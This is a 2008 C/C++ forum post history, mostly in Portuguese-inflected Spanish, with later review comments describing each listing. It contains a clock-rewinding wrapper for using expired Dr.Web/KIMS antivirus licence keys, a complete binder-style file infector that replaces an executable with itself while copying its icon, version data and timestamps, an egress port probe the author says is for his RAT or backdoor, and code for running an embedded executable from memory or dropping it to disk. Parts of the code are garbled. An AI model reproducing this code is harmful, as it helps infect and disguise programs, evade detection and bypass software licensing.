Programación / Programación C/C++ / SOLUCION para DrWeb e KIMS
en: 16 Junio 2008, 14:33
Senhores este final de semana fiz este pequeno programinha que me da possibilidad de poder executar o drwebwcl.exe com um tempo anterior, assim você terá sempre uma chave válida na hora de utilizar com o kims. #include <windows.h> #include <stdio.h> #include <strings.h> #include <windowsx.h> #include <time.h>
/*
 * ProcessCheck: returns TRUE if a process whose image name equals
 * szProcessToKill (case-sensitive strcmp) appears in a Toolhelp snapshot,
 * FALSE otherwise. Despite the parameter name nothing is terminated — the
 * TerminateProcess call is commented out — so this is only the poll that
 * WinMain below uses to wait until drwebwcl.exe has exited.
 *
 * Review notes:
 *  - PROCESSENTRY32 / CreateToolhelp32Snapshot / Process32First live in
 *    <tlhelp32.h>, which the include list of this post does not have.
 *  - The snapshot handle is not checked against INVALID_HANDLE_VALUE.
 *  - When Process32First fails the handle is closed but the do/while still
 *    runs with it, and CloseHandle is reached a second time on the way out.
 *  - OpenProcess(PROCESS_TERMINATE) is requested only to be closed again;
 *    it could go together with the dead TerminateProcess line.
 */
BOOL ProcessCheck(char *szProcessToKill)
{
    HANDLE hProcessSnap;
    HANDLE hProcess;
    PROCESSENTRY32 pe32;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    pe32.dwSize = sizeof(PROCESSENTRY32);
    if(!Process32First(hProcessSnap,&pe32))
        CloseHandle(hProcessSnap); /* no return: the loop below still uses the handle */
    do{
        if(!strcmp(pe32.szExeFile,szProcessToKill))
        {
            hProcess = OpenProcess(PROCESS_TERMINATE,0,pe32.th32ProcessID);
            //TerminateProcess(hProcess,0);
            CloseHandle(hProcess);
            return TRUE;
        }
    } while(Process32Next(hProcessSnap,&pe32));
    CloseHandle(hProcessSnap);
    return FALSE;
}
/*
 * WinMain: runs the Dr.Web command-line scanner (drwebwcl.exe) with the
 * system clock rewound, then puts the clock back.
 *   1. save the current system time in torig and set it to 2008-06-01
 *      11:11 (SetSystemTime takes UTC and needs the SE_SYSTEMTIME_NAME
 *      privilege; its result is not checked);
 *   2. convert the wide command line to a narrow argv;
 *   3. launch  drwebwcl.exe ... /RP"<argv[1]>" "<argv[2]>"  via WinExec;
 *   4. poll ProcessCheck() every 5 s while a drwebwcl.exe is running;
 *   5. restore the saved time.
 *
 * Review notes (risk, not changed here):
 *  - The clock change is machine-wide: event-log timestamps, certificate
 *    validity, Kerberos tickets and scheduled tasks can all see the rewound
 *    time while the scanner runs, and if this process is killed or crashes
 *    between the two SetSystemTime calls nothing restores it.
 *  - The signature has a trailing comma after nShowCmd — a syntax error as
 *    listed.
 *  - argv gets malloc(sizeof(char) * argc) bytes, not argc pointers, and
 *    each wcstombs() target has no room for the terminating NUL.
 *  - argv[1]/argv[2] are read without checking argc, and the sprintf into
 *    buf[100] puts no bound on their length, so long arguments overflow it.
 *  - If WinExec() fails the poll loop ends at once and the time is
 *    restored; if the scanner hangs, the loop never ends.
 *  - __i is a reserved identifier (leading double underscore).
 */
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nShowCmd, ) {
    SYSTEMTIME st, torig;
    WORD year,month,day,hour,minute; // variable declarations
    GetSystemTime(&torig);           // original time, restored at the end
    GetSystemTime(&st);              // template to modify
    year=2008; month=6; day=1; hour=11; minute=11;
    st.wYear=year; st.wMonth=month; st.wDay=day; st.wHour=hour; st.wMinute=minute;
    SetSystemTime(&st);
    int argc; char **argv; LPWSTR *szArglist;
    szArglist = CommandLineToArgvW(GetCommandLineW(), &argc);
    int __i;
    if( NULL == szArglist ) { wprintf(L"CommandLineToArgvW failed\n"); return 0; }
    else {
        argv = (char **) malloc(sizeof(char) * argc);   // see review notes: sizeof(char), not sizeof(char *)
        for( __i=0; __i<argc; __i++) {
            int tmp = wcslen(szArglist[__i]);
            char *c = (char *) malloc(sizeof(char) * tmp); // no +1 for the NUL
            wcstombs(c, szArglist[__i], tmp);
            argv[__i] = c;
        }
    }
    char buf[100];
    sprintf(buf,"drwebwcl.exe /SD- /TB- /TM- /TS- /HA- /UP /RP\"%s\" \"%s\"",argv[1],argv[2]);
    WinExec(buf,SW_SHOW);
    while (ProcessCheck("drwebwcl.exe")){ // wait while drweb is still running
        Sleep (5000);
    }
    SetSystemTime(&torig);
    return 0;
}
Espero ajudar alguem mais, necessita so alterar a data para a da sua chave válida e alterar as configurações do kims para trabalhar em conjunto com este programa. Agradeço todos del elhacker.net e indetectables.net especialmente a Thor e a E0N por disseminar conhecimento.
Programación / Programación C/C++ / Re: Extract ICON and REPLACE
en: 29 Mayo 2008, 01:00
Hello hermanos, mio source solucionando mio problema segue: #include <windows.h>
/* EnumResourceNames callback used by Infect(): for each resource of the
 * enumerated module it locates and locks the resource data and writes it,
 * under the same type/name and a forced en-US language id, into the
 * BeginUpdateResource handle that arrives through lParam. Enumerated with
 * RT_ICON, RT_GROUP_ICON and RT_VERSION this makes the rewritten file show
 * the original program's icon and version block — the impersonation half
 * of the binder below. */
BOOL CALLBACK UpdateResources( HMODULE hModule, LPCTSTR szType, LPTSTR szName, LONG lParam)
{
    HANDLE hUpdate = (HANDLE)lParam;
    HRSRC hRes = FindResource(hModule,szName,szType);
    HGLOBAL hResLoaded = LoadResource(hModule, hRes);
    void* pData = LockResource(hResLoaded);
    int nSizeOfRes = SizeofResource(hModule,hRes);
    UpdateResource(hUpdate,szType,szName,MAKELANGID(LANG_ENGLISH,SUBLANG_ENGLISH_US),pData,nSizeOfRes);
    UnlockResource(hResLoaded);
    FreeResource(hResLoaded);
    return TRUE;
}
/* Trailer record that Infect() appends to a rewritten executable and that
 * CheckSelf() reads back: a 3-byte marker (holds "JK" plus its NUL) and the
 * byte length of the original program stored immediately before this
 * record. Defender's view: an executable whose last 7 bytes end in this
 * "JK" trailer is one produced by this binder. */
typedef struct { char szSignature[3]; DWORD dwFileOffset; }INFECTINFO;
/* Infect(szExePath): turns the file at szExePath into a carrier for this
 * program. Sequence as written: read this program's own image; copy the
 * target to copy.exe; overwrite the target with this program's bytes;
 * clone the target's RT_ICON / RT_GROUP_ICON / RT_VERSION resources from
 * copy.exe into the rewritten file (see UpdateResources above); append the
 * original target bytes followed by an INFECTINFO trailer; put the
 * original file times back. Defender's view: this is a classic binder /
 * file infector — the original program survives as an appended overlay
 * ending in the "JK" trailer, the cloned resources make the result look
 * like the original, and the restored timestamps mean last-modified time
 * cannot be trusted; file hashes and overlay inspection can. Listing note:
 * FILE_ATTRIBUTE_NORMAL is garbled in this page in three places
 * ("NOR AL", "N RMAL"), so the line does not compile as shown. */
void Infect(char szExePath[]) { char szOwnName[MAX_PATH]; GetModuleFileName(NULL,szOwnName,MAX_PATH); HANDLE hFile = CreateFile(szOwnName,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NOR AL,NULL); DWORD dwFileSize = GetFileSize(hFile,NULL); DWORD dwBytesRead; char* lpBuffer = new char[dwFileSize]; ReadFile(hFile,lpBuffer ,dwFileSize ,&dwBytesRead, NULL); CloseHandle(hFile); CopyFile(szExePath , "copy.exe" , FALSE); hFile = CreateFile(szExePath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_N RMAL,NULL); FILETIME tCreate,tAccess,tWrite; GetFileTime(hFile,&tCreate,&tAccess,&tWrite); SetFilePointer(hFile,0,0,FILE_BEGIN); WriteFile(hFile,lpBuffer,dwFileSize , &dwBytesRead, NULL); CloseHandle(hFile); hFile = CreateFile("copy.exe",GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); dwFileSize = GetFileSize(hFile,NULL); lpBuffer = new char[dwFileSize]; ReadFile(hFile,lpBuffer ,dwFileSize ,&dwBytesRead, NULL); INFECTINFO ii = {"JK", dwFileSize}; CloseHandle(hFile); hFile = BeginUpdateResource(szExePath,FALSE); HMODULE hCopy = LoadLibraryEx("copy.exe" ,NULL,LOAD_LIBRARY_AS_DATAFILE); EnumResourceNames(hCopy ,RT_ICON,UpdateResources,(long) hFile ); EnumResourceNames(hCopy ,RT_GROUP_ICON,UpdateResources,(long) hFile ); EnumResourceNames(hCopy ,RT_VERSION,UpdateResources,(long) hFile ); FreeLibrary(hCopy); EndUpdateResource(hFile,FALSE); DeleteFile("copy.exe"); hFile = CreateFile(szExePath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_N RMAL,NULL); SetFilePointer(hFile,0,0,FILE_END); WriteFile(hFile,lpBuffer,dwFileSize, &dwBytesRead, NULL); WriteFile(hFile,&ii,sizeof(ii), &dwBytesRead, NULL); SetFileTime(hFile,&tCreate,&tAccess,&tWrite); CloseHandle(hFile); }
/* CheckSelf(): reads the INFECTINFO trailer from the tail of this
 * program's own image. Returns the stored length of the carried program
 * when the marker compares equal to "JK", otherwise 0 — this is how the
 * carrier decides at start-up whether it is the plain installer or a
 * payload-bearing copy. Listing note: FILE_ATTRIBUTE_NORMAL is garbled
 * here ("NOR AL"). */
DWORD CheckSelf() { char szOwnName[MAX_PATH]; GetModuleFileName(NULL,szOwnName,MAX_PATH); HANDLE hFile = CreateFile(szOwnName,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NOR AL,NULL); SetFilePointer(hFile, -sizeof(INFECTINFO), NULL, FILE_END); DWORD dwBytesRead; INFECTINFO ii; ReadFile(hFile, &ii,sizeof(INFECTINFO) ,&dwBytesRead, NULL); CloseHandle(hFile); if(strcmp(ii.szSignature,"JK")) return 0; else return ii.dwFileOffset; }
/* DropFile(dwFileOffset): copies the dwFileOffset bytes that precede the
 * trailer (the original program appended by Infect()) into temp.exe in the
 * current directory, starts it with CreateProcess and returns the process
 * handle; the thread handle and the file are left as they are. Not
 * referenced by WinMain below, which uses DropFileAndWait instead.
 * Listing note: FILE_ATTRIBUTE_NORMAL and NULL are garbled in this line
 * ("NOR AL", "NUL )"). */
HANDLE DropFile(DWORD dwFileOffset) { char szOwnName[MAX_PATH]; GetModuleFileName(NULL,szOwnName,MAX_PATH); HANDLE hFile = CreateFile(szOwnName,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NOR AL,NULL); char* lpBuffer = new char[dwFileOffset]; SetFilePointer(hFile, -dwFileOffset - sizeof(INFECTINFO) , NULL, FILE_END); DWORD dwBytesRead; ReadFile(hFile,lpBuffer ,dwFileOffset ,&dwBytesRead, NULL); CloseHandle(hFile); hFile = CreateFile("temp.exe",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NUL ); WriteFile(hFile,lpBuffer,dwFileOffset , &dwBytesRead, NULL); CloseHandle(hFile); delete [] lpBuffer; PROCESS_INFORMATION ProcessInfo; STARTUPINFO StartupInfo; ZeroMemory(&StartupInfo, sizeof(StartupInfo)); StartupInfo.cb = sizeof(StartupInfo); CreateProcess("temp.exe",NULL,NULL,NULL,FALSE,0,NULL,NULL,&StartupInfo,&ProcessInfo); return ProcessInfo.hProcess;
}
/* DropFileAndWait(lpFileOffset): thread routine that receives a pointer to
 * the length returned by CheckSelf(). Same extraction as DropFile(), but
 * temp.exe is created with FILE_ATTRIBUTE_HIDDEN, the routine blocks until
 * that process exits, closes both handles and deletes temp.exe; the second
 * `return 0` is unreachable. Defender's view: a hidden temp.exe written
 * next to the carrier, executed and deleted again is the runtime indicator
 * of this binder, and that file is the unmodified original program.
 * Listing note: same garbles as above ("NOR AL", "NUL )"). */
DWORD WINAPI DropFileAndWait(LPVOID lpFileOffset) { DWORD* dwFileOffset = (DWORD*)lpFileOffset; char szOwnName[MAX_PATH]; GetModuleFileName(NULL,szOwnName,MAX_PATH); HANDLE hFile = CreateFile(szOwnName,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NOR AL,NULL); char* lpBuffer = new char[*dwFileOffset]; SetFilePointer(hFile, -*dwFileOffset - sizeof(INFECTINFO) , NULL, FILE_END); DWORD dwBytesRead; ReadFile(hFile,lpBuffer ,*dwFileOffset ,&dwBytesRead, NULL); CloseHandle(hFile); hFile = CreateFile("temp.exe",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN,NUL ); WriteFile(hFile,lpBuffer,*dwFileOffset , &dwBytesRead, NULL); CloseHandle(hFile); delete [] lpBuffer; PROCESS_INFORMATION ProcessInfo; STARTUPINFO StartupInfo; ZeroMemory(&StartupInfo, sizeof(StartupInfo)); StartupInfo.cb = sizeof(StartupInfo); CreateProcess("temp.exe",NULL,NULL,NULL,FALSE,0,NULL,NULL,&StartupInfo,&ProcessInfo); WaitForSingleObject(ProcessInfo.hProcess,INFINITE); CloseHandle(ProcessInfo.hThread); CloseHandle(ProcessInfo.hProcess); return DeleteFile("temp.exe"); return 0; }
/* Entry point of the binder: if this image carries a "JK" trailer, drop
 * and run the embedded program on a worker thread and wait for it;
 * otherwise act as the installer and Infect() a file named notepad.exe in
 * the current directory (a relative path — the author's test target). */
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    DWORD dwCheck = CheckSelf();
    if(dwCheck)
    {
        DWORD dwThreadId;
        HANDLE hThread = CreateThread(NULL,0,DropFileAndWait,&dwCheck,0,&dwThreadId);
        WaitForSingleObject(hThread,INFINITE);
        CloseHandle(hThread);
    }
    else
        Infect("notepad.exe");
    return 0;
}
Programación / Programación C/C++ / Extract ICON and REPLACE
en: 28 Mayo 2008, 22:18
Olá hermanos, estoy tentando extraer lo icone de um executable e sobrescrever lo icone por otro, alguém poderia me ajudar pois estoy atráz de um modelo de codigo de exemplo e no encontro?
Programación / Programación C/C++ / Re: ¿Cómo saber si una puerta está abierta a través de el router
en: 13 Mayo 2008, 20:35
Una version, melhorada: #include <cstdlib> #include <iostream> #include <winsock2.h> #include <stdio.h> #include <windows.h> #define WINSOCK_VERSION MAKEWORD(2,0)
using namespace std;
/* OpenPort(ip, porta): returns true if a blocking TCP connect to
 * ip:porta succeeds, false when connect() reports SOCKET_ERROR. Notes:
 * WSAStartup is repeated on every call (main already does it once), the
 * socket is never closed, and checkSock is assigned but not used. */
bool OpenPort(char* ip, int porta)
{
    int checkSock;
    SOCKET sock;
    WSAData wsa; // You probably forgot to add this..
    WSAStartup(WINSOCK_VERSION,&wsa);
    struct sockaddr_in sClient;
    memset(&sClient,0,sizeof(sClient));
    sock = socket( AF_INET, SOCK_STREAM, 0 );
    sClient.sin_family = AF_INET;
    sClient.sin_addr.s_addr = inet_addr(ip);
    sClient.sin_port = htons( porta );
    if ( (checkSock = connect( sock,(struct sockaddr*)&sClient, sizeof(sClient) )) == SOCKET_ERROR )
        return false;
    return true;
}

/* main (its closing brace is on the next page line): resolves two well-
 * known hosts and tries outbound connects in order — messenger.hotmail.com
 * on 1866, 199.7.83.42 on 53, www.google.com.br on 808, 199.7.83.42 on
 * 22 — printing which one went through. Defender's view: this is an
 * egress probe, the way a backdoor picks a port the perimeter lets out;
 * outbound connects to familiar hosts on unexpected ports (1866, 808) are
 * the signal, and egress filtering plus connection logging is the
 * mitigation. Documentation mismatch: the first branch probes 1866 but
 * prints "conectou 1863". gethostbyname() results are dereferenced
 * without a NULL check. */
int main(int argc, char *argv[])
{
    WSADATA ws;
    if(WSAStartup(MAKEWORD(1,1),&ws)!=0){ fprintf(stderr,"Error:WSAStartup"); }
    struct hostent *messenger;
    struct hostent *google;
    messenger=gethostbyname("messenger.hotmail.com");
    google=gethostbyname("www.google.com.br");
    //printf("%s\n",inet_ntoa(*((struct in_addr *)h->h_addr)));
    if (OpenPort(inet_ntoa(*((struct in_addr *)messenger->h_addr)),1866)) { printf("conectou 1863"); }
    else if (OpenPort("199.7.83.42",53)) { printf("conectou 53"); }
    else if (OpenPort(inet_ntoa(*((struct in_addr *)google->h_addr)),808)) { printf("conectou 808"); }
    else if (OpenPort("199.7.83.42",22)) { printf("conectou 22"); }
} Deste modo posso fazer meu RAT, patchear minha backdoor de acordo com a porta aberta no firewall.
Programación / Programación C/C++ / Re: ¿Cómo saber si una puerta está abierta a través de el router
en: 13 Mayo 2008, 18:37
Ola, soy grato a todos deste foro especialmente E0N, mas consegui resolver mio problema, con seguinte codigo. #include <cstdlib> #include <iostream> #include <winsock2.h> #include <stdio.h> #include <windows.h> #define WINSOCK_VERSION MAKEWORD(2,0)
using namespace std;
/* ConnectToServer(ip): returns true if a blocking TCP connect to ip:8080
 * succeeds, false when connect() reports SOCKET_ERROR. Notes: WSAStartup
 * is called per invocation, the socket is never closed, and checkSock is
 * assigned but not otherwise used. */
bool ConnectToServer(char* ip) {
    int checkSock;
    SOCKET sock;
    WSAData wsa; // You probably forgot to add this..
    WSAStartup(WINSOCK_VERSION,&wsa);
    struct sockaddr_in sClient;
    memset(&sClient,0,sizeof(sClient));
    sock = socket( AF_INET, SOCK_STREAM, 0 );
    sClient.sin_family = AF_INET;
    sClient.sin_addr.s_addr = inet_addr(ip);
    sClient.sin_port = htons( 8080 );
    if ( (checkSock = connect( sock,(struct sockaddr*)&sClient, sizeof(sClient) )) == SOCKET_ERROR )
        return false;
    return true;
}

/* main: probes 10.0.0.1:8080 — a private LAN address, presumably the
 * author's own test host — and prints whether the connect went through.
 * The ';' after the else block is an empty statement. */
int main(int argc, char *argv[]) {
    if (ConnectToServer("10.0.0.1")) { printf("conectou"); }
    else { printf("nao conectou"); };
}
Agora so ire fazer algunas modificaciones e conseguire mios objetivos. Gracias, []'s
Programación / Programación C/C++ / ¿Cómo saber si una puerta está abierta a través de el router
en: 12 Mayo 2008, 23:39
Sorry my bad spanish. Spanish: Hola a todos, necesito hacer una comprobación de puertos: si el programa consigue conectar a través del router (por ejemplo al servidor del messenger, puerto 1863) ejecuta mi código; si no, comprueba otro puerto, por ejemplo 2222, y así sucesivamente. Portuguese: Eu preciso fazer uma checagem de portas: se o programa consegue conectar através do router (por exemplo, se consegue conectar no servidor do messenger) executa um código; se não, ele checa outra porta, por exemplo 2222. Posso apontar um host online.
obrigado a todos! []'s
Programación / Programación C/C++ / Re: Carregando Programa direto na memoria e executando - AJUDA
en: 08 Mayo 2008, 17:30
Caros amigos E0N, Eternal Idol, me ajudem, so consegui chegar aqui, o codigo compila mas no executa no da erro nenhum, estoy compilando con MS Visual C++, este shellcode eres la calculatora de windows, poderia ser qualquer executavel. #include <windows.h> #include <stdio.h>
/*
00000000: 55 push ebp 00000001: 8B EC mov ebp,esp 00000003: 8B 45 08 mov eax,dword ptr [ebp+8] 00000006: 05 66 06 00 00 add eax,666h 0000000B: 5D pop ebp 0000000C: C3 ret
int stupid_add(int x) { return x + 0x666; }*/
/* Byte image the author wants to run from memory. It begins with the MZ
 * header (0x4d 0x5a ...) of a complete executable — per the post, the
 * Windows calculator — and the "..." marks where the listing was cut, so
 * the array is not compilable as shown. It is not the 13-byte stupid_add
 * stub the comment above describes; that comment and this data disagree. */
BYTE stupid_add_code[] = { 0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff, 0xff,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, ... 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00 };
/* main: reserves a PAGE_EXECUTE_READWRITE region in this same process,
 * copies stupid_add_code into it with WriteProcessMemory, and calls the
 * region's first byte as a one-argument function from inline asm; it then
 * passes the byte array itself — not a process handle — to
 * CreateRemoteThread and CloseHandle. Defender's view: RWX allocation +
 * WriteProcessMemory + a call into the new region is the self-injection
 * pattern that memory scanners and EDR hook regardless of payload, and
 * the non-standard `void main()` marks this as MSVC-only code. */
void main() {
    LPVOID stupid_add_codeAddr = VirtualAlloc(0, sizeof(stupid_add_code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    SIZE_T written = 0;
    WriteProcessMemory(GetCurrentProcess(), stupid_add_codeAddr, stupid_add_code, sizeof(stupid_add_code), &written);
    DWORD value = 15;
    __asm {
        push value
        call stupid_add_codeAddr
        add esp, 4
        mov value, eax
    }
    // first argument is the BYTE array, not a HANDLE (see header comment)
    CreateRemoteThread(stupid_add_code,NULL,NULL,(LPTHREAD_START_ROUTINE)stupid_add_codeAddr,NULL,NULL,NULL);
    CloseHandle(stupid_add_code);
    //printf("0x%X\r\n", stupid_add(value));
    // printf("0x%X\r\n", value);
}
Programación / Programación C/C++ / Re: Carregando Programa direto na memoria e executando.
en: 07 Mayo 2008, 16:31
Muito grato E0N, tentarei explicar, pois não desejo injectar dll mas si, executar um segundo programa dentro da memoria. 1. Tenho meu filetest.h ex: static unsigned char topo[]= { 0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff, 0xff,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00, ... } 2. Tengo teste.cpp #include <windows.h> #include <stdio.h> #include <tlhelp32.h> #include "filetest.h"
/* WinMain: writes the embedded byte array to C:\file.exe and runs it —
 * the fclose(), WinExec() and the closing brace are on the next page line.
 * The post says this write-to-disk-then-execute is exactly what the author
 * wants to get rid of; from a defender's stance it is the simplest dropper
 * pattern, and the executable written to the drive root is the artifact
 * to look for. The header shown above declares the array as topo[] while
 * this code uses filetest, so the names do not match, and fopen()'s result
 * goes straight into fwrite() without a NULL check. */
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, PSTR szCmdLine, int iCmdShow) {
    FILE* filetestfile;
    fwrite(filetest,sizeof(filetest),1,filetestfile=fopen("C:\\file.exe","wb"));
fclose(filetestfile); WinExec("C:\\file.exe",SW_SHOW); } O que tenho feito é criar o arquivo so despois executalo, mas o que desejo é no formato mencionado não em ASM, mas em SHELLCODE, executarlo directamente en la memoria sem necessitar-lo criar fisicamente no hardisk e se possivel ainda passando parametros. Soy muito grato a todos de foro elhacker. Vida longa a E0N e nosso amigo Eternal Idol. []'s